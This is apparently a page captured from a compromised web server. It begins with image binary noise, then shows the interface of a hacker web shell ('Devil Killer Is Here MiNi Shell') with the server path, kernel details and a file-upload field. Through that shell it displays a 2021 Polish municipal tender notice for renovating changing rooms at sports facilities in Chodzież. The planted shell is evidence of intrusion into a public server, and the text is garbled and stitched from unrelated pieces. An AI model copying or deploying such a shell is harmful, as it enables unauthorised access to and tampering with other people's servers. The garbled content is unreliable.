JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210610/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20210610/0007791001-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00077910 z dnia 2021-06-10</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Remont szatni na chodzieskich obiektach sportowych” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA MIEJSKA W CHODZIEŻY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 570790992</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Ignacego Jana Paderewskiego 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Chodzież</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-800</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL411 - Pilski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzadmiejski@chodziez.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.chodziez.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> j.s.t. </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Remont szatni na chodzieskich obiektach sportowych” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e9be3002-c9ae-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00077910</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000532/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.6 "Remont szatni na chodzieskich obiektach sportowych"</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.chodziez.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Adres strony internetowej<br/>prowadzonego postępowania: https://bip.chodziez.pl/• Adres strony internetowej służącej do<br/>elektronicznego składania ofert: https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Informacja o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie<br/>komunikował się z wykonawcami, oraz informacje o wymaganiach technicznych i organizacyjnych<br/>sporządzania, wysyłania i odbierania korespondencji elektronicznej. Informacje ogólne: 1. Adres<br/>elektronicznej skrzynki odbiorczej (ePuap) Urzędu Miejskiego w Chodzieży : /8w7k25ehpk/skrytka2.<br/>Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz<br/>przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem<br/>wyjątków określonych w Pzp, odbywa się przy użyciu środków komunikacji elektronicznej, tj.: 1) za<br/>pośrednictwem dedykowanego formularza: „Formularz do komunikacji” dostępnego na ePUAP oraz<br/>udostępnionego przez miniPortal;2) poczty elektronicznej – email: zamowieniapubliczne@chodziez.pl;<br/>(uwaga: nie dotyczy składania ofert) 3. Wykonawca musi posiadać konto na ePUAP. Wykonawca<br/>posiadający konto na ePUAP ma dostęp do formularzy: „Złożenia, zmiany, wycofania oferty lub<br/>wniosku” oraz do „Formularza do komunikacji”. 4. Wymagania techniczne i organizacyjne wysyłania i<br/>odbierania korespondencji elektronicznej przekazywanej przy ich użyciu, zostały opisane w „Instrukcji<br/>Użytkownika Systemu” dostępnej pod adresem internetowym:<br/>https://miniportal.uzp.gov.pl/Instrukcja_uzytkownika_miniPortal-ePUAP.pdf „Instrukcja Użytkownika<br/>systemu stanowi również Załącznik nr 6 do SWZ.5. Maksymalny rozmiar plików przesyłanych za<br/>pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku”<br/>i „Formularza do komunikacji” wynosi 150 MB.6. Za przekazanie oferty, oświadczenia, o którym mowa<br/>w art. 125 ust. 1 Pzp, podmiotowych środków dowodowych oraz innych informacji, oświadczeń lub<br/>dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich przekazania odpowiednio na<br/>ePUAP lub na adres email: zamowieniapubliczne@chodziez.plSposób komunikowania się<br/>Zamawiającego z Wykonawcami (nie dotyczy składania ofert):7. W postępowaniu o udzielenie<br/>zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami, w szczególności składanie<br/>oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za<br/>pośrednictwem dedykowanego formularza: „Formularz do komunikacji” dostępnego na ePUAP oraz<br/>udostępnionego przez miniPortal. 8. We wszelkiej korespondencji związanej z niniejszym<br/>postępowaniem zamawiający i wykonawcy posługują się numerem ogłoszenia o zamówieniu, lub<br/>numerem postepowania, identyfikatorem postępowania (BZP, miniportal).9. Zamawiający może<br/>również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email: zamowieniapubliczne@chodziez.pl (preferowany sposób komunikacji).10. Dokumenty elektroniczne,<br/>oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za<br/>pośrednictwem Formularza do komunikacji jako załączniki. Zamawiający dopuszcza również<br/>możliwość składania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów<br/>lub oświadczeń za pomocą poczty elektronicznej, na wskazany powyżej adres email. Sposób<br/>sporządzenia dokumentów elektronicznych musi być zgody z wymaganiami określonymi w<br/>rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U.<br/>z 2020 r. poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020<br/>r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich<br/>może żądać zamawiający od wykonawcy (Dz. U. z 2020 r. poz. 2415).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Ochrona danych osobowych osób fizycznych i klauzula informacyjna z art. 13 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), zwane dalej „rozporządzeniem 2016/679”.<br/>Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w rawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>1)	Administratorem Pani/Pana danych osobowych przetwarzanych w Urzędzie Miejskim w Chodzieży na potrzeby niniejszego postępowania jest Burmistrz Miasta Chodzieży, siedzibą Burmistrza jest Urząd Miejski w Chodzieży, ul. I.J. Paderewskiego 2, 64-800 Chodzież.<br/>2)	Administrator powołała inspektora ochrony danych osobowych w Urzędzie Miejskim w Chodzieży, jest Pan Krzysztof Ślósarski z którym można się skontaktować pocztą elektroniczną na adres iod@chodziez.pl telefonicznie pod nr 67 28-27-171 lub pod adresem wskazanym powyżej.<br/>3)	Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego – „Remont szatni na chodzieskich obiektach spotrtowych” - Oznaczenie sprawy: Nr UE-ZP.271.7.2021.<br/>4)	Odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 i art. 74 ustawy oraz art. 96 ust. 3 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 1919 ze zm.), dalej „ustawa Pzp”.<br/>5)	Dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. <br/>6)	Obowiązek podania przez Wykonawcę/ów danych osobowych bezpośrednio Wykonawcy/ów dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp.<br/>7)	W odniesieniu danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO.<br/>1.	Wykonaca/cy posiada/ją:<br/>a)	na podstawie art. 15 RODO prawo dostępu do danych osobowych wykonawcy/ów dotyczących;<br/>b)	na podstawie art. 16 RODO prawo do sprostowania Wykonawcy/ów danych osobowych **;<br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***; <br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Wykonawca/y, że przetwarzanie danych osobowych Wykonawcy/ów dotyczących narusza przepisy RODO;<br/>2.	Wykonawcy/om nie przysługuje:<br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">UE-ZP.271.7.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest „Remont szatni na chodzieskich obiektach sportowych”.Zakres<br/>rzeczowy zadania obejmuje remont 3 szatni zlokalizowanych na terenie Miejskiego Ośrodka<br/>Sportu i Rekreacji w Chodzieży. Pomieszczenia szatni wymagają tzw. prac naprawczych,<br/>wymiany dachu, wymiany instalacji wod-kan, wymiany opraw oświetlenia, wymiany armatury,<br/>wymiany umywalek, sanitariatów, natrysków, wymiany kabin przebieralni, wymiany okien, drzwi<br/>itp. Na gruntowny remont szatni na boisku Orlik składa się m.in. na wymiana dachu, wymiana<br/>sanitariatów, armatury, umywalek i natrysków, wymiana świetlików, wymiana opraw oświetlenia<br/>oraz instalacji wod-kan, malowanie itp.Następnie prac naprawczych wymaga również szatnia<br/>zlokalizowana na terenie Pływalni Delfin. W ramach tego zadania planuje się wymianę okien,<br/>malowanie ścian i sufitów, wymianę kabin przebieralni, osłon grzejnikowych, wymianę opraw<br/>oświetlenia itp. Natomiast w szatni zlokalizowanej przy kortach tenisowych w ramach zadania<br/>planuje się obudowę ścian, wymianę instalacji wod-kan, wymianę opraw oświetlenia, wymianę<br/>płytek na ścianach i podłogach, malowanie ścian i sufitów, wymianę armatury, umywalek,<br/>prysznicy, sanitariatów itp. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111100-9 - Roboty w zakresie burzenia</p> <p class="mb-0">45232460-4 - Roboty sanitarne</p> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45324000-4 - Roboty w zakresie okładziny tynkowej</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45421100-5 - Instalowanie drzwi i okien, i podobnych elementów</p> <p class="mb-0">45431000-7 - Kładzenie płytek</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">70 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Opis kryteriów oceny ofert wraz z podaniem wag tych kryteriów i sposobu<br/>oceny ofert.1. Najkorzystniejszą ofertą będzie oferta, która przedstawia najkorzystniejszy bilans „ceny” i<br/>kryterium „okres gwarancji”.2. Ocenie ofert podlegają tylko oferty niepodlegające odrzuceniu.3. Przy<br/>wyborze oferty zamawiający będzie kierował się następującymi kryteriami: C1 – cena oferty brutto –<br/>waga 60%G2 – okres gwarancji w miesiącach– waga 40% 4. Punkty przyznawane za podane powyżej<br/>kryteria będą liczone następująco:a. Cena oferty będzie oceniana według następującego wzoru: Cena<br/>oferty najniższej C1 = -------------------------------- x 60%x100 Cena oferty badanejOferowaną przez<br/>Wykonawcę cenę Zamawiający ustali w oparciu o dane podane przez Wykonawcę w formularzu<br/>ofertowym (załącznik nr 1 do SWZ).b. Okres gwarancji za wykonane prace i roboty będzie oceniany<br/>według następującego wzoru: Okres gwarancji badanej oferty w miesiącach C2 = ----------------------------<br/>--------------------------------- x 40%x100 Najdłuższy okres gwarancji w miesiącach Minimalny okres<br/>gwarancji wymagany przez Zamawiającego wynosi 12 miesięcy, natomiast maksymalny 36<br/>miesięcy.Oferowany przez Wykonawcę okres gwarancji Zamawiający ustali w oparciu o dane podane<br/>przez Wykonawcę w formularzu ofertowym (załącznik nr 1 do SWZ).W przypadku podania przez<br/>wykonawcę w formularzu oferty okresu gwarancji krótszegoniż 12 miesięcy, oferta tego wykonawcy<br/>zostanie odrzucona na podstawie art. 226 ust. 1 pkt 5 Pzp.5. Za najkorzystniejszą zostanie uznana<br/>oferta spełniająca wymogi ustawy Pzp i SWZ, która uzyska największą liczbę punktów stanowiących<br/>sumę punktów przyznanych w ramach każdego z podanych kryteriów oceny ofert.Ocena końcowa =<br/>C1 + G26. Maksymalna łączna liczba punktów jaką może uzyskać Wykonawca wynosi 100 pkt.7. Za<br/>najkorzystniejszą zostanie uznana oferta, która uzyska łącznie najwyższą liczbę punktów.8. Obliczenia<br/>dokonywane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji w miesiacach</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają następujące warunki<br/>udziału dotyczące: 1. Zdolności do występowania w obrocie gospodarczym. Zamawiający nie<br/>określa warunku udziału w postępowaniu odnośnie zdolności do występowania w obrocie<br/>gospodarczym. 2. Uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej o ile wynika to z odrębnych przepisów. Zamawiający nie określa warunku udziału w<br/>postępowaniu odnośnie uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej o ile wynika to z odrębnych przepisów. 3. Sytuacji ekonomicznej lub<br/>finansowej.Wykonawca spełni warunek udziału w postępowaniu dotyczący sytuacji ekonomicznej<br/>lub finansowej, jeżeli wykaże, że:Zamawiający nie określa warunku udziału w<br/>postępowaniu odnośnie uprawnień do4. Zdolności technicznej lub zawodowej. Wykonawca<br/>spełni warunek udziału w postępowaniu dotyczący zdolności technicznej lub zawodowej, jeżeli<br/>wykaże, że:a) wykonał nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu<br/>składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej<br/>1 zamówienie o charakterze zgodnym z przedmiotem zamówienia i wartości nie mniejszej -<br/>100.000,00złWykaz należy sporządzić wg. Załącznika Nr 4 do SWZ. b) dysponuje następującym<br/>osobami skierowanymi przez Wykonawcę do realizacji zamówienia publicznego,<br/>odpowiedzialnych za kierowanie robotami budowlanymi tj.:- osobą posiadającą uprawnienia<br/>budowlane do kierowania robotami w specjalności konstrukcyjno – budowlanej, Wykaz należy<br/>sporządzić wg. Załącznika Nr 5 do SWZ. ;5. Oceniając zdolność techniczną lub zawodową,<br/>Zamawiający może, na każdym etapie postępowania, uznać, że wykonawca nie posiada<br/>wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w<br/>szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne<br/>przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację<br/>zamówienia.6. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych<br/>lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać<br/>na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane.7. W przypadku, o którym mowa w pkt. 6, Wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego<br/>wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy. Wzór<br/>oświadczenia stanowi Załącznik nr 8 do SWZ <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">4. Wykaz podmiotowych środków dowodowych na potwierdzenie braku<br/>podstaw wykluczenia Wykonawcy z udziału w postępowaniu w postępowaniu:1) zaświadczenie<br/>właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem<br/>podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 Pzp, wystawione nie wcześniej niż 3 miesiące przed<br/>jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem<br/>zamawiający żąda złożenia dokumentów potwierdzających, że przed upływem terminu składania ofert<br/>wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub<br/>zawarł wiążące porozumienie w sprawie spłat tych należności; 2) zaświadczenie albo innego<br/>dokumentu właściwej terenowej jednostki organizacyjnej 